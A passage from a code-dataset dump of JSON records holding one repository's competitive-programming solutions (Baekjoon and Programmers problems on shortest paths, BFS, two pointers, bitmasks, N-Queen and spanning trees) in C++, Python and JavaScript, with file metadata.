<vector>\n#include <map>\n#define startNameLen vec[s].second\n#define endNameLen vec[e].second\nusing namespace std;\n\nvector<pair<int,int>> vec;\nmap<int, int> m; \nint n, k;\nint s = 0, e = 0;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n string str;\n long long ans = 0;\n\n cin >> n >> k;\n\n for(int i = 0 ; i < n ; i++){\n cin >> str;\n vec.push_back({i + 1, str.length()}); // (등수, 이름의 길이)\n }\n \n while(1){\n if(e == n) { // end는 끝에 다다르고 start만 증가해야 하는 경우\n while(s < n){\n // 범위를 벗어난 값 제거 (창문에서 나가는 값)\n if(m[startNameLen] > 1) m[startNameLen]--;\n else if(m[startNameLen] == 1) m.erase(m[startNameLen]);\n s++;\n\n if(m[startNameLen] > 1) ans += m[startNameLen] - 1; // 쌍의 개수 구하기\n }\n break;\n }\n\n if(e - s > k) { // 범위를 벗어난 값 제거 (창문에서 나가는 값)\n if(m[startNameLen] > 1) m[startNameLen]--;\n else if(m[startNameLen] == 1) m.erase(startNameLen);\n s++;\n }\n\n while(e - s <= k){ // end 값을 증가시키며 새로운 값 처리 (창문에 새로 들어오는 값)\n if(m.find(endNameLen) == m.end()) m.insert({endNameLen, 1});\n else m[endNameLen]++;\n\n if(e - s == k){ // 쌍의 개수 구하기\n if(m[startNameLen] > 1) ans += m[startNameLen] - 1;\n }\n\n e++;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.34866827726364136, "alphanum_fraction": 0.4043583571910858, "avg_line_length": 21.351350784301758, "blob_id": "ba017719c4f48312e8e8e7d4204a729202fd18c9", "content_id": "a275e390d1e3b70e83f35725dd1a065d87dfb5d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, 
"license_type": "no_license", "max_line_length": 58, "num_lines": 37, "path": "/BOJ/Implementation/9610.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 9610번: 사분면\n//2021-05-04\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, q1=0, q2=0, q3=0, q4=0, axis=0;\n pair<int, int> pos;\n\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n int x, y;\n cin >> x >> y;\n pos = make_pair(x, y);\n\n if(pos.first > 0 && pos.second > 0)\n q1++;\n else if(pos.first < 0 && pos.second > 0)\n q2++;\n else if(pos.first < 0 && pos.second < 0)\n q3++;\n else if(pos.first > 0 && pos.second < 0)\n q4++;\n else\n axis++;\n }\n\n cout << \"Q1: \" << q1 << \"\\n\";\n cout << \"Q2: \" << q2 << \"\\n\";\n cout << \"Q3: \" << q3 << \"\\n\";\n cout << \"Q4: \" << q4 << \"\\n\";\n cout << \"AXIS: \" << axis << \"\\n\";\n\n return 0;\n}" }, { "alpha_fraction": 0.5265700221061707, "alphanum_fraction": 0.6135265827178955, "avg_line_length": 13.857142448425293, "blob_id": "2224a934b39408c043a32c6525de93a0fc77c774", "content_id": "67e240b6c1ad27c45b983223129b6f3bdebaa006", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 25, "num_lines": 14, "path": "/BOJ/Implementation/11656.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 11656.py\n# BOJ 11656: 접미사 배열\n# DATE: 2022-03-15\nimport sys\nread = sys.stdin.readline\n\ns = read().strip()\ns_list = []\n\nfor i in range(len(s)):\n s_list.append(s[i:])\n\nfor i in sorted(s_list):\n print(i)" }, { "alpha_fraction": 0.42092689871788025, "alphanum_fraction": 0.4495938718318939, "avg_line_length": 22.266666412353516, "blob_id": "c8ed33638a5cd96f89b9a85a963a00b417d20293", "content_id": "f103f368881ce6a98a3cb1778f8e31829cc22840", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2137, "license_type": "no_license", "max_line_length": 88, "num_lines": 90, "path": "/BOJ/BFS_DFS/14502.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14502번: 연구소\nDATE: 2021-10-07\nUPDATE: 2022-04-03\nBFS\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <queue>\n#include <string.h>\n#define MAX 8\nusing namespace std;\n\nvector<pair<int, int>> virus, candidate;\nint n, m, ans = -1;\nint arr[MAX][MAX], tmp[MAX][MAX], visited[MAX][MAX];\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\n\nvoid bfs(int x, int y) {\n queue<pair<int, int>> q;\n\n q.push(make_pair(x, y));\n visited[x][y] = 1;\n\n while(!q.empty()) {\n int x = q.front().first;\n int y = q.front().second;\n q.pop();\n\n for(int i = 0 ; i < 4 ; i++) {\n int nx = x + dx[i];\n int ny = y + dy[i];\n\n if(nx < 0 || ny < 0 || nx >= n || ny >= m || visited[nx][ny] == 1) continue;\n if(tmp[nx][ny] == 1) continue;\n\n visited[nx][ny] = 1;\n q.push(make_pair(nx, ny));\n tmp[nx][ny] = 2;\n }\n \n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n cin >> arr[i][j];\n if(arr[i][j] == 2) virus.push_back(make_pair(i, j));\n else if(arr[i][j] == 0) candidate.push_back(make_pair(i, j));\n }\n }\n\n vector<bool> idx(candidate.size(), false);\n\n for(int i = 0 ; i < 3 ; i++) idx[i] = true;\n sort(idx.begin(), idx.end());\n\n do{\n int cnt = 0;\n\n memcpy(tmp, arr, sizeof(arr));\n memset(visited, 0, 
sizeof(visited));\n\n for(int i = 0 ; i < idx.size() ; i++){\n if(idx[i]) tmp[candidate[i].first][candidate[i].second] = 1; //벽 설치\n }\n\n for(int i = 0 ; i < virus.size() ; i++) {\n bfs(virus[i].first, virus[i].second); //바이러스 위치에서 bfs 시작\n }\n\n for(int i = 0 ; i < n ; i++) {\n for(int j = 0 ; j < m ; j++) {\n if(tmp[i][j] == 0) cnt++; //안전 영역 수\n }\n }\n\n ans = max(cnt, ans); \n }while(next_permutation(idx.begin(), idx.end()));\n \n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4429223835468292, "alphanum_fraction": 0.47031962871551514, "avg_line_length": 17.29166603088379, "blob_id": "f79083ca218acc314dbf6f7801a1f4d4245cd806", "content_id": "13566d243b1e251fe73652c168d3817df1cf09e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 438, "license_type": "no_license", "max_line_length": 53, "num_lines": 24, "path": "/programmers/Level 2/h-index.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: H-index\n2021-12-26\n*/\nfunction solution(citations) {\n let answer = 0;\n let num = citations.length;\n\n citations.sort((a, b) => {\n return a - b\n });\n\n for (let i = num; i >= 0; i--) {\n let index = citations.findIndex(v => v >= i);\n index = index === -1 ? num : index;\n\n if (num - index >= i) {\n answer = i\n break;\n }\n }\n\n return answer;\n}" }, { "alpha_fraction": 0.4190231263637543, "alphanum_fraction": 0.4627249240875244, "avg_line_length": 18.475000381469727, "blob_id": "d4c930877ff3390c4edda6234f6c953cd50828cc", "content_id": "764398c5462b022f27da6ff1b73804407ba6a524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 786, "license_type": "no_license", "max_line_length": 64, "num_lines": 40, "path": "/BOJ/Two Pointer/2470.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2470번: 두 용액\n2021-12-28\nTwo pointer\n*/\n#include <iostream>\n#include <algorithm>\n#include <vector>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n;\n cin >> n;\n\n vector<int> ans(2);\n int start = 0, end = n - 1, min = 2000000001;\n int arr[n];\n\n for(int i = 0 ; i < n ; i++) cin >> arr[i];\n sort(arr, arr + n);\n \n while(start < end) {\n int sum = arr[start] + arr[end];\n\n if(abs(sum) < min) {\n ans[0] = arr[start];\n ans[1] = arr[end];\n min = abs(sum);\n }\n \n if(sum < 0) start++;\n else end--;\n }\n\n sort(ans.begin(), ans.end());\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << \" \";\n\n return 0;\n}" }, { "alpha_fraction": 0.4434320330619812, "alphanum_fraction": 0.46545177698135376, "avg_line_length": 19.59375, "blob_id": "9fed0277bea674980b7b58435d002cf276cef8df", "content_id": "21c862dafb99a2da4d03304213f82311de514fd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1327, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/BOJ/Dijkstra/1753.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1753번: 최단경로\nDATE: 2021-02-18\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 20001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int, int>> graph[MAX];\nint d[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int, int>>> pq; \n \n pq.push(make_pair(0, start));\n d[start] = 0;\n\n while(!pq.empty()){\n int cost = 
pq.top().first;\n int now = pq.top().second;\n pq.pop();\n\n for(int i = 0 ; i < graph[now].size() ; i++){ \n int next = graph[now][i].first;\n int nCost = graph[now][i].second;\n if(cost + nCost < d[next]){\n d[next] = cost + nCost;\n pq.push(make_pair(d[next], next));\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int v, e, start;\n\n cin >> v >> e >> start;\n\n for(int i = 0 ; i < e ; i++){\n int x, y, z;\n cin >> x >> y >> z;\n graph[x].push_back(make_pair(y, z)); \n }\n\n for(int i = 1 ; i <= v ; i++){\n d[i] = INF;\n }\n\n dijkstra(start);\n\n for(int i = 1 ; i <= v ; i++){\n if(d[i] == INF)\n cout << \"INF\" << \"\\n\";\n else \n cout << d[i] << \"\\n\";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4838709533214569, "alphanum_fraction": 0.5107526779174805, "avg_line_length": 15.441176414489746, "blob_id": "573ef80e2f0324ccbcce6f728a4b3eb6c6b3f7ab", "content_id": "fda8255867e5e0a234af9e38818f8ebd66923efc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 566, "license_type": "no_license", "max_line_length": 52, "num_lines": 34, "path": "/programmers/Level 3/network.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 3: 네트워크\n2022-02-24\nDFS\n*/\n#include <string>\n#include <vector>\n#define MAX 200\nusing namespace std;\n\nvector<vector<int>> cp;\nbool visited[MAX];\n\nvoid dfs(int num, int n){\n visited[num] = true;\n \n for(int i = 0 ; i < n ; i++) {\n if(cp[num][i] && !visited[i]) dfs(i, n);\n }\n}\n\nint solution(int n, vector<vector<int>> computers) {\n int answer = 0;\n cp = computers;\n \n for(int i = 0 ; i < n ; i++){\n if(!visited[i]) {\n answer++;\n dfs(i, n);\n }\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.3135313391685486, "alphanum_fraction": 0.34873488545417786, "avg_line_length": 18.36170196533203, "blob_id": "104dd654a66dd40f3e5144b28189b9b80c5d2ec3", "content_id": "8f0f306ec8687f0d6a838750978667193cdc2411", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 915, "license_type": "no_license", "max_line_length": 58, "num_lines": 47, "path": "/BOJ/Bitmask/11723.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 11723번: 집합\nDATE: 2022-01-25\nBitmask\n*/\n#include <iostream>\nusing namespace std;\n\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m, num;\n string cmd;\n\n int s = 0;\n\n cin >> m;\n\n for(int i = 0 ; i < m ; i++){\n cin >> cmd;\n\n if(cmd == \"add\") {\n cin >> num;\n s |= (1 << num);\n }\n else if(cmd == \"remove\") {\n cin >> num;\n s &= ~(1 << num);\n }\n else if(cmd == \"check\") {\n cin >> num;\n if(s & (1 << num)) cout << 1 << '\\n';\n else cout << 0 << '\\n';\n }\n else if(cmd == \"toggle\") {\n cin >> num;\n if(s & (1 << num)) s &= ~(1 << num);\n else s |= (1 << num);\n }\n else if(cmd == \"all\") {\n s = (1 << 21) - 1;\n }\n else if(cmd == \"empty\") s = 0;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.42465752363204956, "alphanum_fraction": 0.47534245252609253, "avg_line_length": 20.5, "blob_id": "44601b66291296d440dcb7503adc837567062b77", "content_id": "afb50138094e048c5c652ec1333f5124a3f4f257", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 744, "license_type": "no_license", "max_line_length": 93, "num_lines": 34, "path": "/programmers/Level 1/recommend_new_id.js", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", 
"text": "/*\nprogrammers Level 1: 신규 아이디 추천\n2021 KAKAO BLIND RECRUITMENT\n2021-12-26\n*/\nfunction solution(new_id) {\n // 1\n new_id = new_id.toLowerCase();\n\n // 2\n new_id = new_id.replace(/[^\\w-.]/g, '');\n\n // 3\n new_id = new_id.replace(/[.]+/g, '.');\n\n // 4\n new_id = new_id[0] === \".\" ? new_id.slice(1) : new_id;\n new_id = new_id[new_id.length - 1] === \".\" ? new_id.slice(0, new_id.length - 1) : new_id;\n\n // 5\n new_id = new_id.length === 0 ? \"a\" : new_id;\n\n // 6\n new_id = new_id.slice(0, 15);\n new_id = new_id[14] === '.' ? new_id.slice(0, 14) : new_id;\n\n // 7\n if (new_id.length < 3) {\n let tmp = new_id[new_id.length - 1];\n while (new_id.length < 3) new_id += tmp;\n }\n\n return new_id;\n}" }, { "alpha_fraction": 0.5056179761886597, "alphanum_fraction": 0.5692883729934692, "avg_line_length": 15.75, "blob_id": "3856a2a3bd166ceeccc9e7fe225df2cfa565e5cf", "content_id": "d7971ebdacf4811f9f40a6cb2d7d7e60b36cb5e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 35, "num_lines": 16, "path": "/BOJ/Mathematics/1735_2.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1735_2.py (math 라이브러리의 gcd 함수 사용)\n# BOJ 1735: 분수 합\n# DATE: 2022-03-16\nimport sys\nimport math\nread = sys.stdin.readline\n \na, b = map(int, read().split())\nc, d = map(int, read().split())\n\nn = a * d + b * c\nm = b * d\n\ndiv = math.gcd(n, m)\n\nprint(n // div, m // div)" }, { "alpha_fraction": 0.4885145425796509, "alphanum_fraction": 0.5107197761535645, "avg_line_length": 19.746030807495117, "blob_id": "a1690b03c84b821471aec46aecb81051c80e9ee7", "content_id": "1cdccf0874cc4315bb33b5069a4353aa0962ed13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 58, "num_lines": 63, "path": "/BOJ/MST/1922_1.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//BOJ 1922번: 네트워크 연결\n//Kruskal Algorithm\n//2021-07-12\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint n, m, a, b, c, ans=0;\npair<int, pair<int, int>> edge[100000];\n\nint getParent(int parent[], int x){\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent, parent[x]);\n}\n\nvoid unionParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int parent[], int a, int b){\n a = getParent(parent, a);\n b = getParent(parent, b);\n if(a == b) return 1;\n else return 0;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n int parent[n+1];\n\n for(int i = 1 ; i <= n ; i++){\n parent[i] = i;\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b >> c;\n edge[i].first = c;\n edge[i].second.first = a;\n edge[i].second.second = b;\n }\n\n sort(edge, edge + m);\n\n for(int i = 0 ; i < m ; i++){\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(parent, a, b)) continue;\n else{\n unionParent(parent, a, b);\n ans += c;\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4373657703399658, "alphanum_fraction": 0.46814602613449097, "avg_line_length": 15.84337329864502, "blob_id": "0ce115c5b4f901b72bba30e6aee26bfda31dd853", "content_id": "824b7b6a491c7187a30ea8aa781d0efc53480972", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "C++", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 81, "num_lines": 83, "path": "/BOJ/Greedy/2513.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2513번: 통학버스\nDATE: 2021-01-14\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\n\tint n, k, s, cnt;\n\tlong long d1, d2;\n\tcin >> n >> k >> s;\n\t\n\tvector<pair <int, int>> v;\n\n\tfor(int i = 0 ; i < n ; i++) {\n\t\tint loc, dst;\n\t\tcin >> loc >> dst;\n\t\tv.push_back(make_pair(loc, dst));\n\t}\n\tv.push_back(make_pair(s, 0));\n\tsort(v.begin(), v.end()); \n\n\tint str = 0, end = n;\n\tint idx = lower_bound(v.begin(), v.end(), make_pair(s, 0)) - v.begin(); //학교 인덱스\n\n\tfor (int i = 0; i <= n; i++) {\n\t\tcout << v[i].first << \" \" << v[i].second << endl;\n\t}\n\n\tint i = str;\n\td1 = 0, cnt = 0;\n\twhile (i < idx) { //학교 앞\n\t\tcnt += v[i].second;\n\n\t\tif (cnt <= k) { //한번에 태울 수 있을 때\n\t\t\tv[i].second = 0;\n\t\t\ti++;\n\t\t\tif (i == idx) {\n\t\t\t\td1 += (s - v[str].first) * 2;\n\t\t\t}\n\t\t}\n\t\telse if (cnt > k) { //나눠 태워야 할 때\n\t\t\tv[i].second = cnt - k;\n\t\t\tcnt = cnt - v[i].second; \n\n\t\t\td1 += (s - v[str].first) * 2;\n\n\t\t\tcnt = 0;\n\t\t\tstr = i;\n\t\t}\n\t}\n\n\tint j = end;\n\td2 = 0, cnt = 0;\n\twhile (j > idx) { // 학교 뒤\n\t\tcnt += v[j].second;\n\n\t\tif (cnt <= k) { //한번에 태울 수 있을 때\n\t\t\tv[j].second = 0;\n\t\t\tj--;\n\t\t\tif (j == idx) {\n\t\t\t\td2 += (v[end].first - s) * 2;\n\t\t\t}\n\t\t}\n\t\telse if (cnt > k) { //나눠 태워야 할 때\n\t\t\tv[j].second = cnt - k;\n\t\t\tcnt = cnt - v[j].second;\n\n\t\t\td2 += (v[end].first - s) * 2;\n\n\t\t\tcnt = 0;\n\t\t\tend = j;\n\t\t}\n\t}\n\n\tcout << d1 + d2;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.4539969861507416, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 14.090909004211426, "blob_id": "17aa0fdee30b1ce14ade7892d70104af482ced00", "content_id": "d07d99788b65063c5a9c7c5b9197f2530972b41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 677, "license_type": "no_license", "max_line_length": 71, "num_lines": 44, "path": "/BOJ/Backtracking/9663.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9663번: N-Queen\nDATE: 2022-04-15\n*/\n#include <iostream>\n#define MAX 15\nusing namespace std;\n\nint N, ans;\nint col[MAX];\n\nbool check(int num){\n for(int i = 0 ; i < num ; i++){\n if(col[i] == col[num]) return false; // 같은 행\n else if(abs(col[num] - col[i]) == num - i) return false; // 대각선\n }\n\n return true;\n}\n\nvoid nqueen(int num){\n if(num == N){\n ans++;\n return;\n }\n\n for(int i = 0 ; i < N ; i++){\n col[num] = i;\n if(check(num)) nqueen(num + 1);\n }\n \n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n \n cin >> N;\n\n nqueen(0);\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4431487023830414, "alphanum_fraction": 0.5072886347770691, "avg_line_length": 18.628570556640625, "blob_id": "9c3f91a1d34105f6582cf08162d7a342a9ca7387", "content_id": "5a074a30736964ecb8de8e3edf1407b56691c035", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 700, "license_type": "no_license", "max_line_length": 72, "num_lines": 35, "path": "/BOJ/Binary Search/18353.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 18353번: 병사 배치하기\nDATE: 2022-01-08\nUPDATE: 2022-02-11\nLongest Increasing 
Subsequence\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n \n vector<int> v1(n), v2;\n\n for(int i = 0 ; i < n ; i++) cin >> v1[i];\n reverse(v1.begin(), v1.end());\n\n for(int i = 0 ; i < n ; i++) {\n if(v2.empty() || v1[i] > v2.back()) {\n v2.push_back(v1[i]);\n continue;\n }\n\n int idx = lower_bound(v2.begin(), v2.end(), v1[i]) - v2.begin();\n v2[idx] = v1[i];\n }\n\n cout << n - v2.size();\n\n return 0;\n}" }, { "alpha_fraction": 0.4897959232330322, "alphanum_fraction": 0.559183657169342, "avg_line_length": 16.571428298950195, "blob_id": "31bf6fdb8ded23417ee757b01449f41f77ef841b", "content_id": "3cfeef14cb38f9f30d41ac12f760ee1d5d06d1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 257, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/BOJ/Mathematics/1934.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# 1934.py\n# BOJ 1934번: 최소공배수\n# DATE: 2022-03-18\nimport sys\nread = sys.stdin.readline\n\ndef gcd(a, b):\n return a if b == 0 else gcd(b, a % b)\n\nt = int(read())\n\nfor _ in range(t):\n a, b = map(int, read().split())\n print(a * b // gcd(a, b))" }, { "alpha_fraction": 0.5146579742431641, "alphanum_fraction": 0.5423452854156494, "avg_line_length": 17.636363983154297, "blob_id": "fd5b7500aa523d0345a682e2f564b04e86cb6ba6", "content_id": "888f8afc3e5c2e9ad22cbfafca61fab5e61351c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 614, "license_type": "no_license", "max_line_length": 91, "num_lines": 33, "path": "/programmers/Level 2/h-index.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: H-index\n2021-12-26\n*/\n#include <vector>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nint solution(vector<int> citations) {\n int answer = 0;\n int num = citations.size();\n \n sort(citations.begin(), citations.end()); \n \n for(int i = num ; i >= 0 ; i--) {\n int index = lower_bound(citations.begin(), citations.end(), i) - citations.begin();\n\n if(i <= num - index) {\n answer = i;\n break;\n }\n }\n \n return answer;\n}\n\nint main(){\n int answer = solution({3, 0, 6, 1, 5});\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.4646017551422119, "alphanum_fraction": 0.51106196641922, "avg_line_length": 13.612903594970703, "blob_id": "c58b02c6d4a346cbc59bce19e6962c3f50d5c729", "content_id": "fb75844517bd545518e13593ca04654f607abfd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 460, "license_type": "no_license", "max_line_length": 52, "num_lines": 31, "path": "/BOJ/Implementation/1927.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1252", "text": "/*\nBOJ 1927¹ø: ÃÖ¼Ò Èü\nDATE: 2021-01-07\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0);\n\tint n, x;\n\tpriority_queue<int, vector <int>, greater <int>>pq;\n\n\tcin >> n;\n\n\tfor (int i = 0; i < n; i++) {\n\t\tcin >> x;\n\n\t\tif (x != 0) pq.push(x);\n\t\telse if (x == 0) {\n\t\t\tif (pq.empty()) {\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tcout << pq.top() << \"\\n\";\n\t\t\tpq.pop();\n\t\t}\n\t}\n\t\n\treturn 0;\n}" }, { "alpha_fraction": 0.4374590814113617, "alphanum_fraction": 
0.459070086479187, "avg_line_length": 19.931507110595703, "blob_id": "60ca4ef7ca375b46e1d8edf9f62f234e852008f4", "content_id": "a15aa2305134b9ca31fd0457c0a1d9aeed2585ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1541, "license_type": "no_license", "max_line_length": 95, "num_lines": 73, "path": "/BOJ/Dijkstra/1238_2.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1238번: 파티\nDATE: 2021-07-13\nDijkstra Algorithm\n*/\n#include <iostream>\n#include <queue>\n#include <algorithm>\n#define MAX 1001\n#define INF 1e9\nusing namespace std;\n\nvector<pair<int, int>> graph[MAX];\nint dst[MAX], ans[MAX];\nint n, m, x, s, e, t;\n\nvoid dijkstra(int start){\n priority_queue<pair<int, int>, vector<pair<int, int>>, greater<pair<int,int>>> pq; //거리, 노드\n pq.push(make_pair(0, start));\n dst[start] = 0;\n\n while(!pq.empty()){\n int cost = pq.top().first;\n int now = pq.top().second;\n pq.pop();\n\n for(int i = 0 ; i < graph[now].size() ; i++){\n int next = graph[now][i].first;\n int nCost = graph[now][i].second;\n \n if(cost+nCost < dst[next]){\n dst[next] = cost + nCost;\n pq.push(make_pair(cost + nCost, next));\n }\n }\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m >> x;\n\n for(int i = 1 ; i <= n ; i++){\n dst[i] = INF;\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> s >> e >> t;\n graph[s].push_back(make_pair(e, t));\n }\n\n //i to x\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n dst[j] = INF;\n }\n dijkstra(i);\n ans[i] = dst[x];\n }\n\n for(int i = 1 ; i <= n ; i++) dst[i] = INF;\n\n // start x\n dijkstra(x);\n\n for(int i = 1 ; i <= n ; i++){\n ans[i] += dst[i];\n }\n\n cout << *max_element(ans+1, ans+n+1);\n\n return 0;\n}" }, { "alpha_fraction": 0.5322195887565613, "alphanum_fraction": 0.5680190920829773, "avg_line_length": 19, "blob_id": "b1eb07289480d985cbe1546b22961bcf16056d93", "content_id": "2250bd360cbcf292a58867f262a1c2bbfc0b99ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 429, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/programmers/Level 1/make_prime_number.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: 소수 만들기\n# date: 2022-04-14\nfrom itertools import combinations\nfrom math import sqrt\n\ndef isPrime(num):\n for i in range(2, int(sqrt(num) + 1)):\n if num % i == 0: return False\n \n return True\n \ndef solution(nums):\n answer = 0\n \n nums = sorted(nums)\n \n for i in combinations(nums, 3):\n if isPrime(sum(i)):\n answer += 1\n \n return answer" }, { "alpha_fraction": 0.4716981053352356, "alphanum_fraction": 0.48899370431900024, "avg_line_length": 20.94827651977539, "blob_id": "8a8c3b22c7a06b75ccc3afb40b5407575130b71d", "content_id": "d5e11218410dc40fc97715f507c5777d82a5a782", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1276, "license_type": "no_license", "max_line_length": 84, "num_lines": 58, "path": "/programmers/Level 2/delivery.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 배달\ndate: 2022-06-03\n*/\n#include <iostream>\n#include <vector>\n#include <queue>\n#define MAX 51\n#define INF 1e9\nusing namespace std;\n\nint dst[MAX];\nvector<pair<int,int>> graph[MAX];\n\nvoid dijkstra(int start){\n priority_queue<pair<int,int>, vector<pair<int,int>>, greater<pair<int,int>>> 
pq;\n \n pq.push({0, start});\n dst[start] = 0;\n \n while(!pq.empty()){\n int node = pq.top().second;\n int cost = pq.top().first;\n pq.pop();\n \n for(int i = 0 ; i < graph[node].size() ; i++){\n int nextNode = graph[node][i].first;\n int nextCost = graph[node][i].second;\n \n if(dst[nextNode] > cost + nextCost){\n dst[nextNode] = cost + nextCost;\n pq.push({dst[nextNode], nextNode});\n }\n }\n }\n}\n\nint solution(int N, vector<vector<int>> road, int K) {\n int answer = 0;\n \n for(auto i : road){\n int a = i[0];\n int b = i[1];\n int c = i[2];\n \n graph[a].push_back({b, c});\n graph[b].push_back({a, c});\n }\n \n fill(dst, dst+MAX, INF);\n dijkstra(1);\n \n for(int i = 1 ; i <= N ; i++){\n if(dst[i] != INF && dst[i] <= K) answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.4583333432674408, "alphanum_fraction": 0.47537878155708313, 